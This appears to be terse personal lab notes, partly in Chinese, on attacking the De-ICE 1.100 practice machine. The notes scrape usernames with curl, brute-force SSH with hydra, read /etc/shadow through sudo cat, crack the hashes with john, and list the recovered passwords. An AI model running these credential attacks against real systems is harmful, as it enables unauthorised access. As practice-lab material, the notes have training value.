john and hydra using de-ice1.100
配置IP ipconfig etho 192.168.179.111
http://192.168.179.111/index2.php
curl http://192.168.179.111/index2.php |grep -E -o "\b[a-zA-Z0-9.-]+@\b"
curl http://192.168.179.111/index2.php |grep -E -o "\b[a-zA-Z0-9.-]+@\b" |cut -d "@" -f1
提取邮箱
curl http://192.168.179.111/index2.php |grep -E -o "[a-zA-Z0-9_-]+@[a-zA-Z0-9_-]+(\.[a-zA-Z0-9_-]+)"
hydra破解密码
hydra -L /home/user.txt -P /home/unix_passwords.txt -t 5 ssh://192.168.179.111
user.txt的内容
princess
marym
patrickp
thompsont
benedictb
genniege
michaelp
elong
aadams
bbanter
ccoffee
nostradamus
bbanter@slax:~$ cat /etc/group root::0:root bin::1:root,bin,daemon daemon::2:root,bin,daemon sys::3:root,bin,adm adm::4:root,adm,daemon tty::5: disk::6:root,adm lp::7:lp mem::8: kmem::9: wheel::10:root
aadams:x:1000:10:,,,:/home/aadams:/bin/bash bbanter:x:1001:100:,,,:/home/bbanter:/bin/bash ccoffee:x:1002:100:,,,:/home/ccoffee:/bin/bash
aadams在wheel组下,wheel类似于一个管理员的组。
使用sudo -l
aadams@slax:~$ sudo -l We trust you have received the usual lecture from the local System Administrator. It usually boils down to these three things: #1) Respect the privacy of others. #2) Think before you type. #3) With great power comes great responsibility. Password: User aadams may run the following commands on this host: (root) NOEXEC: /bin/ls (root) NOEXEC: /usr/bin/cat (root) NOEXEC: /usr/bin/more (root) NOEXEC: !/usr/bin/su *root*
使用sudo 执行cat命令 aadams@slax:~$ sudo cat /etc/shadow Password: root:$1$TOi0HE5n$j3obHaAlUdMbHQnJ4Y5Dq0:13553:0::::: bin:*:9797:0::::: daemon:*:9797:0::::: adm:*:9797:0::::: lp:*:9797:0::::: sync:*:9797:0:::::
使用john破解shadow密码
john --format=aix-smd5 --wordlist=/home/rockyou.txt mm.txt
结果如下
root:tarot:13553:0::::: aadams:nostradamus:13550:0:99999:7::: bbanter:bbanter:13550:0:99999:7::: ccoffee:hierophant:13550:0:99999:7:::
在用root登陆的过程中发现root不允许远程登陆
可以使用普通用户登陆后,su到root上。
rockyou.txt下载地址:
https://pan.baidu.com/s/1hfnY4bkZ9UABbQ_kdjRUfw